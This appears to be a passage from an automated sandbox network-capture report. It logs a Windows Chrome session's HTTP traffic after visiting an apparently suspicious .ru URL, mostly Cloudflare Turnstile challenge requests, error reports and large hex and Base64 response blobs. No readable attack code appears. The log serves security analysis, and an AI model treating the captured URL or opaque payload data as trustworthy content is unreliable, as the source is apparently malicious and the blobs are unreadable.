                                                                                                                                                                                                                          Data Ascii: s9bERkKEowYylQMGhOQkJGZzp7UlNLbk5thFtWdlNFWUJ9SEloZ0dbZW1OUWBXd1OQcFZ0mnOOcFWdkaJZcoB4gp2qlmWNca2LcHS1h6GBlXWdr3ycuHi+kqKPr7O+wLa4vKy5xq2ly6etj7bGwdWt28aXuLbR2tKZ5Lu/wtjnpdW07L3ozcauxsXwrN+vsNDjs7TQ57e44Ou7vODvv8D288PE9vfHyAf7y8wHAM/RFwTT1RcI19nbDNvdJiYg9
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 70 57 6d 4a 4f 5a 57 42 48 4e 47 74 47 59 7a 4d 30 63 6d 63 33 4f 48 4a 72 4f 7a 32 43 62 7a 39 42 67 6e 4e 44 52 55 64 33 52 30 6d 52 6b 59 74 69 56 58 39 50 55 55 78 4e 58 4a 53 58 65 70 36 50 64 46 71 4d 6f 71 52 65 5a 34 69 6f 59 6d 74 38 72 47 5a 75 61 37 42 71 63 71 71 30 62 6e 69 59 75 48 4a 38 6a 4c 78 32 66 33 76 41 65 6f 4f 36 78 48 35 36 74 70 4f 6a 79 4c 71 58 71 36 7a 4f 6d 37 43 4d 72 4a 2b 74 77 64 61 6a 73 72 65 56 79 64 71 38 76 62 2b 76 31 36 58 68 76 61 54 6e 32 39 37 49 71 4f 53 2f 70 71 50 46 73 4e 53 39 39 65 48 6a 36 4c 72 32 75 38 2f 61 7a 37 33 33 74 4e 58 31 41 37 7a 58 78 4f 62 67 34 38 4c 36 7a 41 4c 62 33 68 50 50 34 39 51 49 79 66 54 55 38 67 6a 6e 39 68 58 71 36 53 44 63 46 65 38 55 42 2f 7a 7a 4b 53 7a 72 34 69 6f 4b 41 4f
                                                                                                                                                                                                                          Data Ascii: pWmJOZWBHNGtGYzM0cmc3OHJrOz2Cbz9BgnNDRUd3R0mRkYtiVX9PUUxNXJSXep6PdFqMoqReZ4ioYmt8rGZua7Bqcqq0bniYuHJ8jLx2f3vAeoO6xH56tpOjyLqXq6zOm7CMrJ+twdajsreVydq8vb+v16XhvaTn297IqOS/pqPFsNS99eHj6Lr2u8/az733tNX1A7zXxObg48L6zALb3hPP49QIyfTU8gjn9hXq6SDcFe8UB/zzKSzr4ioKAO
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 56 30 68 45 62 56 74 38 64 31 70 66 50 30 41 38 65 49 42 64 55 55 42 55 5a 59 4e 35 57 47 6d 4f 66 56 78 74 6b 59 46 67 63 5a 53 46 5a 48 57 58 69 57 68 35 56 33 31 68 6e 58 70 67 6f 35 65 5a 66 5a 75 6b 66 34 5a 38 6a 70 74 37 66 5a 31 73 68 4a 2b 6e 71 4a 52 30 75 4a 79 45 76 59 61 73 6a 73 44 42 72 4b 4f 43 6c 48 32 68 79 59 54 4a 79 63 75 2f 78 38 47 4d 30 34 6e 52 69 35 2b 76 74 37 43 30 73 73 32 71 6b 4a 58 67 74 37 61 63 76 75 50 6c 74 64 50 5a 74 72 2f 47 76 4d 37 63 38 4d 66 44 7a 75 58 4f 74 65 57 30 39 75 50 32 32 39 71 77 37 76 37 4e 34 76 37 44 32 4d 55 47 35 4e 59 4b 42 38 76 67 79 64 2f 4e 43 4d 54 6e 36 2f 44 4d 35 39 54 31 35 67 54 54 31 41 38 49 31 39 6b 66 44 4e 76 64 48 78 44 66 34 65 49 71 4a 50 6f 74 47 4f 66 70 4d 78 7a 72 37 65 6a
                                                                                                                                                                                                                          Data Ascii: V0hEbVt8d1pfP0A8eIBdUUBUZYN5WGmOfVxtkYFgcZSFZHWXiWh5V31hnXpgo5eZfZukf4Z8jpt7fZ1shJ+nqJR0uJyEvYasjsDBrKOClH2hyYTJycu/x8GM04nRi5+vt7C0ss2qkJXgt7acvuPltdPZtr/GvM7c8MfDzuXOteW09uP229qw7v7N4v7D2MUG5NYKB8vgyd/NCMTn6/DM59T15gTT1A8I19kfDNvdHxDf4eIqJPotGOfpMxzr7ej
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 6e 4a 39 4e 30 74 62 59 31 78 67 58 6e 68 68 58 45 47 4d 59 32 4a 49 61 6f 2b 52 59 58 2b 46 59 6d 74 79 61 48 71 49 6e 48 4e 76 65 70 43 65 6d 49 52 74 6b 36 47 49 68 32 5a 35 63 34 57 64 61 4b 32 74 73 6e 75 4c 6b 34 4e 77 74 62 57 6e 71 37 4f 74 65 4c 43 48 6c 34 43 7a 74 70 79 65 76 36 4b 69 6d 73 4f 6d 71 6f 6e 48 71 71 37 49 79 36 36 7a 74 4b 44 4a 74 36 4c 54 74 72 75 75 31 37 71 2f 6e 36 43 63 32 4f 43 39 73 61 43 70 35 62 6d 6f 78 64 2f 67 7a 4b 7a 6f 7a 4c 4c 7a 39 4c 2f 58 7a 65 76 72 31 4e 65 33 79 64 66 7a 38 64 66 65 31 4e 37 6a 43 64 2f 61 78 4f 62 46 77 50 34 50 33 66 49 50 30 2b 6a 56 35 39 55 51 7a 4f 7a 75 32 39 51 65 2b 39 6b 6b 32 68 62 67 47 65 63 6d 4b 43 72 38 47 50 59 4b 41 50 67 4e 46 41 6f 55 38 67 59 42 47 42 54 30 4f 6a 6f 2f
                                                                                                                                                                                                                          Data Ascii: nJ9N0tbY1xgXnhhXEGMY2JIao+RYX+FYmtyaHqInHNvepCemIRtk6GIh2Z5c4WdaK2tsnuLk4NwtbWnq7OteLCHl4Cztpyev6KimsOmqonHqq7Iy66ztKDJt6LTtruu17q/n6Cc2OC9saCp5bmoxd/gzKzozLLz9L/Xzevr1Ne3ydfz8dfe1N7jCd/axObFwP4P3fIP0+jV59UQzOzu29Qe+9kk2hbgGecmKCr8GPYKAPgNFAoU8gYBGBT0Ojo/
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 35 35 5a 6b 46 41 58 58 35 57 59 32 39 71 67 49 32 54 69 56 39 4c 64 33 64 72 65 57 70 5a 64 5a 79 4c 69 48 2b 64 65 6e 4e 67 63 58 56 33 5a 4a 79 58 70 49 71 4f 71 59 47 42 72 4c 43 44 63 4b 65 43 6e 32 39 78 73 71 4e 7a 64 58 65 6e 64 33 6e 42 77 62 75 53 68 61 39 2f 67 58 78 39 6a 4d 54 48 71 73 37 49 30 49 71 52 79 74 53 4f 6c 37 6a 59 6b 70 75 73 33 4a 61 65 6d 2b 43 61 6f 74 72 6b 6e 71 6a 47 31 65 62 47 70 4c 2b 37 7a 36 6d 74 36 4f 71 73 74 73 65 31 7a 74 44 61 73 2f 43 38 38 66 50 42 2f 64 6e 41 78 41 62 56 38 2f 6a 71 33 2b 58 48 37 76 7a 74 30 65 50 64 30 41 41 57 35 42 58 79 37 65 76 59 2b 76 54 77 36 66 72 75 44 75 38 6b 47 42 76 7a 41 69 6e 38 2b 41 59 75 41 42 77 68 38 67 54 79 42 75 67 43 45 43 50 77 4f 68 6b 62 4f 50 59 79 2f 42 34 68 51
                                                                                                                                                                                                                          Data Ascii: 55ZkFAXX5WY29qgI2TiV9Ld3dreWpZdZyLiH+denNgcXV3ZJyXpIqOqYGBrLCDcKeCn29xsqNzdXend3nBwbuSha9/gXx9jMTHqs7I0IqRytSOl7jYkpus3Jaem+CaotrknqjG1ebGpL+7z6mt6Oqstse1ztDas/C88fPB/dnAxAbV8/jq3+XH7vzt0ePd0AAW5BXy7evY+vTw6fruDu8kGBvzAin8+AYuABwh8gTyBugCECPwOhkbOPYy/B4hQ
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 41 69 47 4e 33 68 49 78 6e 66 6f 69 51 61 34 47 43 61 33 4f 49 61 70 68 7a 6a 4a 32 65 69 6f 74 62 5a 48 61 53 61 48 4f 69 61 6f 47 45 65 32 36 46 69 48 74 79 69 59 74 32 64 6f 32 50 64 6e 71 52 6c 4a 75 65 71 5a 36 50 6b 5a 36 64 74 37 75 64 75 38 4f 62 68 38 43 6b 6f 70 75 71 79 4b 79 64 71 63 66 49 73 4d 50 4c 7a 62 69 59 32 4d 6d 71 71 64 54 51 72 37 48 45 6f 37 69 2f 35 63 72 68 75 72 72 6a 71 75 69 6b 32 2b 44 6e 36 50 4b 31 74 2f 72 32 75 62 76 38 7a 37 2f 68 74 50 44 64 2f 72 79 2b 2b 63 58 41 41 77 72 46 2b 2f 6a 72 44 67 44 6e 37 51 76 32 39 65 50 6c 42 74 54 72 31 51 7a 35 2b 52 37 2b 47 52 33 78 35 76 6a 36 38 75 63 71 43 51 76 75 44 2b 63 6b 4b 43 62 2b 44 42 67 54 4b 53 6b 4b 4f 51 67 47 43 43 6f 55 49 68 4d 43 48 67 45 34 50 44 6c 41 2f 44
                                                                                                                                                                                                                          Data Ascii: AiGN3hIxnfoiQa4GCa3OIaphzjJ2eiotbZHaSaHOiaoGEe26FiHtyiYt2do2PdnqRlJueqZ6PkZ6dt7udu8Obh8CkopuqyKydqcfIsMPLzbiY2MmqqdTQr7HEo7i/5crhurrjquik2+Dn6PK1t/r2ubv8z7/htPDd/ry++cXAAwrF+/jrDgDn7Qv29ePlBtTr1Qz5+R7+GR3x5vj68ucqCQvuD+ckKCb+DBgTKSkKOQgGCCoUIhMCHgE4PDlA/D
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 62 6d 35 32 6a 33 4a 79 61 70 4e 32 65 6c 6d 58 65 6e 36 59 6d 33 36 44 68 48 43 5a 68 33 4b 6a 68 6f 74 2b 70 34 71 50 62 33 42 73 71 4c 43 4e 67 5a 4b 50 6b 35 61 73 6c 6f 71 70 6a 34 70 39 6c 49 2b 30 66 62 47 54 6f 6f 6d 66 71 73 4b 75 75 39 43 6e 71 36 37 46 72 61 36 73 6f 4d 66 55 78 61 61 6c 33 63 6a 4b 75 71 43 7a 6f 4c 4b 38 75 61 66 43 70 64 65 34 78 75 44 44 79 64 72 6b 33 39 44 54 36 4c 4c 76 32 4f 4c 4c 75 4e 6a 66 30 51 48 59 77 62 7a 65 78 50 66 33 35 4d 51 46 31 64 6a 6c 36 75 54 51 34 63 51 43 38 68 66 4d 46 76 54 6d 47 68 6a 58 47 2b 38 65 47 43 50 38 36 78 34 57 34 43 51 6e 45 75 51 72 4b 77 59 67 4b 53 4c 75 2b 76 41 79 4e 44 59 49 49 78 50 35 45 42 62 33 45 79 34 55 49 6a 49 4d 48 6a 63 68 48 7a 38 57 48 51 49 62 53 53 51 65 52 55 30
                                                                                                                                                                                                                          Data Ascii: bm52j3JyapN2elmXen6Ym36DhHCZh3Kjhot+p4qPb3BsqLCNgZKPk5asloqpj4p9lI+0fbGToomfqsKuu9Cnq67Fra6soMfUxaal3cjKuqCzoLK8uafCpde4xuDDydrk39DT6LLv2OLLuNjf0QHYwbzexPf35MQF1djl6uTQ4cQC8hfMFvTmGhjXG+8eGCP86x4W4CQnEuQrKwYgKSLu+vAyNDYIIxP5EBb3Ey4UIjIMHjchHz8WHQIbSSQeRU0
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC1369INData Raw: 6c 43 5a 65 48 71 62 56 70 46 64 57 58 36 68 6f 36 56 30 70 49 4a 39 65 32 65 67 68 48 31 34 6f 48 36 62 66 6f 32 77 6b 49 65 42 6a 71 65 48 69 61 6c 34 6b 4a 57 7a 73 36 43 41 78 4c 57 52 6b 6f 47 65 6c 71 57 65 76 4a 75 64 72 34 71 6b 72 4a 2b 77 74 35 44 4c 30 38 32 5a 6d 4e 62 64 6c 36 75 31 77 37 7a 41 76 74 33 47 31 71 47 33 75 64 71 72 76 4f 76 6a 34 39 43 77 31 73 48 45 30 76 44 4d 78 76 7a 4b 36 63 67 42 76 64 66 64 2b 74 37 31 43 64 2f 62 35 76 33 6c 35 75 54 59 41 41 33 39 33 74 30 57 35 67 54 7a 35 65 76 58 44 77 44 78 47 74 63 69 38 67 59 66 37 2f 6b 49 39 52 77 72 48 75 6e 6c 36 43 37 77 4a 43 63 52 38 4f 30 5a 43 43 67 78 44 77 77 4c 39 42 44 38 4e 52 6b 61 4a 44 59 41 46 53 45 57 49 30 6f 70 4b 77 55 48 51 67 35 54 49 46 49 56 53 45 73 31
                                                                                                                                                                                                                          Data Ascii: lCZeHqbVpFdWX6ho6V0pIJ9e2eghH14oH6bfo2wkIeBjqeHial4kJWzs6CAxLWRkoGelqWevJudr4qkrJ+wt5DL082ZmNbdl6u1w7zAvt3G1qG3udqrvOvj49Cw1sHE0vDMxvzK6cgBvdfd+t71Cd/b5v3l5uTYAA393t0W5gTz5evXDwDxGtci8gYf7/kI9RwrHunl6C7wJCcR8O0ZCCgxDwwL9BD8NRkaJDYAFSEWI0opKwUHQg5TIFIVSEs1


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          20192.168.2.184980335.190.80.1443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:07 UTC536OUTOPTIONS /report/v4?s=tziHdpkoCEKt0CsF%2Fbc7FyWGB3Dhu%2BGtFT66JCs6RQiZuUOtkxC7NMgrnXIBYw2XsD9sCGpos0sfwtv67XKF3LwU6C6rXPjxOcH8EfcGVdNIQlJ4X%2Bvnmvc913WAuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Origin: https://vexino.mactans.ru
                                                                                                                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:08 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          access-control-max-age: 86400
                                                                                                                                                                                                                          access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                          access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                          date: Tue, 17 Dec 2024 17:21:07 GMT
                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          21192.168.2.184980435.190.80.1443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:09 UTC476OUTPOST /report/v4?s=tziHdpkoCEKt0CsF%2Fbc7FyWGB3Dhu%2BGtFT66JCs6RQiZuUOtkxC7NMgrnXIBYw2XsD9sCGpos0sfwtv67XKF3LwU6C6rXPjxOcH8EfcGVdNIQlJ4X%2Bvnmvc913WAuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Content-Length: 432
                                                                                                                                                                                                                          Content-Type: application/reports+json
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:09 UTC432OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 36 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 76 65 78 69 6e 6f 2e 6d 61 63 74 61 6e 73 2e 72 75 2f 32 31 45 7a 75 4f 4a 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 32 30 38 2e 33 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f
                                                                                                                                                                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":362,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://vexino.mactans.ru/21EzuOJ/","sampling_fraction":1.0,"server_ip":"172.67.208.33","status_code":404,"type":"http.error"},"type":"network-erro
                                                                                                                                                                                                                          2024-12-17 17:21:09 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                          date: Tue, 17 Dec 2024 17:21:09 GMT
                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          22192.168.2.1849805104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:09 UTC597OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/23085707:1734452156:WblsTdAJEcjJkQ6MdfC5aVXpjbsW6KLUWCunspYRaNE/8f38965da8164322/UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:10 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:10 GMT
                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                          Content-Length: 7
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-chl-out: nqEQSUWgJ+ln/AD+Ou54LzwAsDkMWL0TZsU=$CUmV7KiADNjvCRR3
                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f3896868bdb8c17-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:10 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                          Data Ascii: invalid


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          23192.168.2.1849806104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:11 UTC811OUTGET /cdn-cgi/challenge-platform/h/b/pat/8f38965da8164322/1734456067754/419efe1e59f95ef2d623cf66173f5d1618a76a3e3584ba92125c2cd6aca37a03/Rmq4r5O10Pi1hY1 HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:11 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:11 GMT
                                                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                          Content-Length: 1
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          2024-12-17 17:21:11 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 51 5a 37 2d 48 6c 6e 35 58 76 4c 57 49 38 39 6d 46 7a 39 64 46 68 69 6e 61 6a 34 31 68 4c 71 53 45 6c 77 73 31 71 79 6a 65 67 4d 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                                                                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gQZ7-Hln5XvLWI89mFz9dFhinaj41hLqSElws1qyjegMAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                                                                                                                          2024-12-17 17:21:11 UTC1INData Raw: 4a
                                                                                                                                                                                                                          Data Ascii: J


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          24192.168.2.1849807104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:12 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/8f38965da8164322/1734456067754/uaxTCBfY0EP6nEY HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/icqy5/0x4AAAAAAA2OnbUL2-DXkbe_/auto/fbE/normal/auto/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:13 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:12 GMT
                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f389697fea04232-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:13 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 33 00 00 00 62 08 02 00 00 00 72 11 7c 2f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                          Data Ascii: PNGIHDR3br|/IDAT$IENDB`


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          25192.168.2.1849808104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:14 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/8f38965da8164322/1734456067754/uaxTCBfY0EP6nEY HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:14 UTC200INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:14 GMT
                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                          Content-Length: 61
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f3896a2796e1881-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:14 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 33 00 00 00 62 08 02 00 00 00 72 11 7c 2f 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                          Data Ascii: PNGIHDR3br|/IDAT$IENDB`


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          26192.168.2.1849809104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:14 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/23085707:1734452156:WblsTdAJEcjJkQ6MdfC5aVXpjbsW6KLUWCunspYRaNE/8f38965da8164322/UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          Content-Length: 31138
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                          CF-Chl-RetryAttempt: 0
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
